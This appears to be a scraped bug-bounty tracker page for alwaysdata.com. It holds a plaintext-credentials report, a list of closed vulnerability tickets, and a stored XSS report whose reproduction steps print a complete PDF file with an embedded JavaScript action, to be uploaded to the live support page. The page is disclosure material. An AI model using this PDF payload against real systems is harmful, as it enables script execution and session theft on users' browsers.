Account Takeover: Malicious actors can exploit the vulnerability to gain unauthorized control over user accounts, posing a risk to the security and privacy of affected users.
Data Breach: The transmission of credentials in plain text exposes users' sensitive information to interception, increasing the risk of data breaches and privacy violations.

Severity:

The severity of this vulnerability is considered critical due to the potential for unauthorized access, account takeover, and data breaches. It undermines the security and trustworthiness of the Alwaysdata.com platform and poses significant risks to its users.
Recommendation for Mitigation:
To mitigate this vulnerability, I recommend the following actions:

Implement HTTPS encryption for all pages, especially those involving sensitive operations like login.
Ensure that all user credentials, including email and password, are transmitted securely using encryption techniques such as TLS.
Implement strong authentication mechanisms, such as multi-factor authentication (MFA), to enhance the security of user accounts.
Conduct regular security assessments and audits to identify and address vulnerabilities in the platform's security controls.
I believe that addressing this vulnerability promptly is crucial to ensuring the security and privacy of users' accounts and sensitive information on the Alwaysdata.com platform. I am available to provide further assistance or clarification on this matter if needed.

Thank you for your attention to this report, and I look forward to your prompt response and actions to address this vulnerability.

Sincerely,
Neel Shukla
Shuklaneel525@gmail.com

 62  Stored XSS Via Upload Document Closed17.07.2024 Task Description
  • Vulnerability Explanation-When a user uploads a document containing malicious code, such as JavaScript, to the web application, it gets stored on the server without proper validation or sanitization. This allows an attacker to inject and execute arbitrary scripts within the application's context.
  • Impact-This vulnerability enables attackers to execute unauthorized scripts on the client-side, leading to session hijacking, data theft, or defacement of the web application. It can compromise user privacy, damage the application's reputation, and potentially expose sensitive information to malicious actors.
  • Severity-High
 63  Stored XSS Via Upload Document Closed17.07.2024 Task Description

Vulnerability Explanation-When a user uploads a document containing malicious code, such as JavaScript, to the web application, it gets stored on the server without proper validation or sanitization. This allows an attacker to inject and execute arbitrary scripts within the application's context.

Impact-This vulnerability enables attackers to execute unauthorized scripts on the client-side, leading to session hijacking, data theft, or defacement of the web application. It can compromise user privacy, damage the application's reputation, and potentially expose sensitive information to malicious actors.

Severity-High

Steps to reproduce- 1) go to support https://admin.alwaysdata.com/support/

                      2) Open new ticket 
                      3) upload this code as a.pdf (%PDF-1.3

%����
1 0 obj
«/Pages 2 0 R /Type /Catalog» endobj
2 0 obj
«/Count 1 /Kids [3 0 R] /Type /Pages» endobj
3 0 obj
«/AA

<</O
<</JS
(

try {

app.alert\("xss"\)

} catch \(e\) {

app.alert\(e.message\);

}

  ) 
/S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>

endobj
4 0 obj
«/Length 21» stream

BT
/F1 24 Tf
ET

  

endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer

«/Root 1 0 R /Size 5» startxref
493
%%EOF)

4) upload this file
5)Open this ticket
6) click on ulpaded malicious pdf file it will refelct

 55  Session Not Invalidated on Permission Change Closed12.07.2024
 32  Server Path Traversal + Information Disclosure on admin ...Closed15.02.2024
 44  Security Vulnerability | Business Logic Flaw Closed28.03.2024
 24  Security Report:Broken Access Control (BAC) in [admin.a ...Closed01.02.2024
 33  Privilege Escalation in admin.alwaysdata.com - Academic ...Closed16.02.2024
 14  Potential SSRF Vulnerability via Self-XSS Closed18.01.2024
 46  Open Redirection Vulnerability Closed13.04.2024
 60  On-click Delete any invitation in [admin.alwaysdata.com ...Closed30.07.2024
 12  No rate limit on Submit tickets Closed15.01.2024
 40   No Rate Limit On Reset Password in admin.alwaysdata.co ...Closed27.03.2024
 79  Nginx version leaking Information Disclosure Closed23.09.2024
 51  Multiple Free Public Cloud accounts obtained by a singl ...Closed25.04.2024
 58  Missing Invitation Link for Existing Users Closed12.07.2024
 13  Lack of Verification Email  Closed16.01.2024
 54  Lack of Verification Email Closed06.06.2024
 57  Lack of Password Confirmation on Delete Account and GET ...Closed15.07.2024
 17  Lack of password confirmation on account deletion Closed19.01.2024
 53  Lack of Email Confirmation During Account Creation Closed05.06.2024
 64  Insecure Account Deletion Closed22.07.2024
 43  Information Disclosure PHPpgAdmin Closed03.04.2024
 30  Information Disclosure on cAdvisor software via Origin  ...Closed16.02.2024
 47  information disclosure Closed13.04.2024
 35  Git Folder Forbidden Bypass Closed22.02.2024
 18  .git file exposed Closed18.01.2024
 42  Git Configuration Exposure Closed27.03.2024
Showing tasks 1 - 50 of 62 Page 1 of 2

Available keyboard shortcuts

Tasklist

Task Details

Task Editing